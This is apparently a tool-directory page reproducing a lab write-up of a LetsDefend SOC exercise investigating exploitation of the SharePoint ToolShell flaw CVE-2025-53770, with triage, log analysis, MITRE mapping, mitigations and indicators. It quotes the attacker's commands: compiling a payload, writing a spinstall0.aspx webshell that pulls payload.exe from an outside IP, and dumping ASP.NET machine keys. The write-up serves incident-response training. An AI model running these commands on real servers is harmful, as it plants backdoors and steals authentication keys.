Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — 一项活动 培养分析技能和报告能力 | Kitploit
工具/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
漏洞分析漏洞利用Web应用程序漏洞利用取证分析威胁情报学习与教育事件响应实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

一项活动 培养分析技能和报告能力

查看仓库
31年前尚未审核
分享

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

这是在Let's Defend平台上进行的一项调查,基于最近的一个SharePoint CVE。让我们来看一下。

Immagine 2025-07-27 162109
  1. 检查规则名称。规则名称通常是为要检测的攻击专门创建的。通过检查规则名称,你可以了解你面对的是哪种攻击。

SOC342规则检测到一个未认证的POST请求,目标是有漏洞的ToolPane.aspx页面,其特征包括:

  • 一个大型有效载荷(Content-Length: 7699)
  • 一个可疑的referer(SignOut.aspx),可能用于混淆来源
  • 行为与利用ToolShell漏洞一致
  1. 检测流量发生在哪两个设备之间。

一个外部用户(IP: 107.191.58.76)向内部SharePoint服务器(172.16.20.17)发送了一个精心构造的请求。

分析我们端点的日志

2

一个w3wp.exe进程执行编码的PowerShell命令可能表明存在潜在的漏洞利用或后利用活动(例如,执行隐藏的有效载荷)。

在SharePoint环境中,验证这种行为是预期的还是属于滥用非常重要。

该命令已使用base64进行混淆

Immagine 2025-07-27 163800

此有效载荷允许攻击者提取并打印运行它的机器上的关键ASP.NET配置密钥。

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

  • 在服务器上根据C#源代码编译一个可执行文件。
  • 在SharePoint路径中创建一个Web后门(恶意ASPX文件),当访问时,允许执行或下载外部有效载荷。

cmd.exe /c echo <WebShell> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

此命令在SharePoint LAYOUTS文件夹中创建一个名为spinstall0.aspx的文件,并将内容写入其中(此处是表示webshell代码的占位符)。

这是spinstall0.aspx的哈希值: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

让我们在VirusTotal上查看一下。

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

此命令允许攻击者访问MachineKeySection的应用程序配置,从而可能暴露敏感加密密钥,如验证密钥和解密密钥。

这些密钥对ASP.NET安全至关重要,保护诸如身份验证cookie和ViewState之类的内容。

暴露或检索这些密钥可让攻击者伪造身份验证令牌、解密受保护数据,或对Web应用程序执行其他攻击。

MITRE ATT&CK

mitre

分析师备注:

该警报是由于在SharePoint服务器上观察到异常的PowerShell活动而触发的,后来被确定为针对CVE-2025-53770的利用尝试。攻击者首先使用C#编译器(csc.exe)投放并编译了一个自定义的C#可执行文件(payload.exe),然后在可Web访问的SharePoint目录中创建了一个恶意的ASPX webshell(spinstall0.aspx)。随后,运行了一个PowerShell命令,通过.NET反射从服务器配置中检索敏感的加密机器密钥。这一系列操作表明这是一个多阶段攻击,旨在维持持久控制并可能伪造身份验证令牌。该webshell经VirusTotal验证为恶意,检测比率为39/62。该事件确认为真阳性,建议采取进一步的遏制和修复措施。

Immagine 2025-07-27 170751

CVE-2025-53770 详情

在本地版Microsoft SharePoint Server中,对不可信数据的反序列化允许未授权攻击者通过网络执行代码。Microsoft已知悉CVE-2025-53770存在野外利用。Microsoft正在准备并全面测试一个综合性更新以解决此漏洞。与此同时,请确保已应用此CVE文档中提供的缓解措施,以保护您免受利用。

Immagine 2025-07-27 171020

Microsoft建议的缓解措施: 为缓解潜在攻击,客户应:

  1. 使用受支持的本地版SharePoint Server
  2. 应用上述链接中的最新安全更新
  3. 部署Microsoft Defender for Endpoint保护或等效威胁解决方案
  4. 确保开启并正确配置反恶意软件扫描接口(AMSI),并配合适当的防病毒解决方案(如Defender Antivirus)
  5. 轮换SharePoint Server ASP.NET机器密钥

IoC

  • Spinstall0.aspx – 威胁行为者使用的Web shell
  • 行为者还以多种方式修改了文件名——例如spinstall.aspx、spinstall1.aspx、spinstall2.aspx

本报告基于在Let's Defend平台上进行的一次活动。所有发现和材料仅供教育目的。所有权利和所有权归Let's Defend所有。

下载工具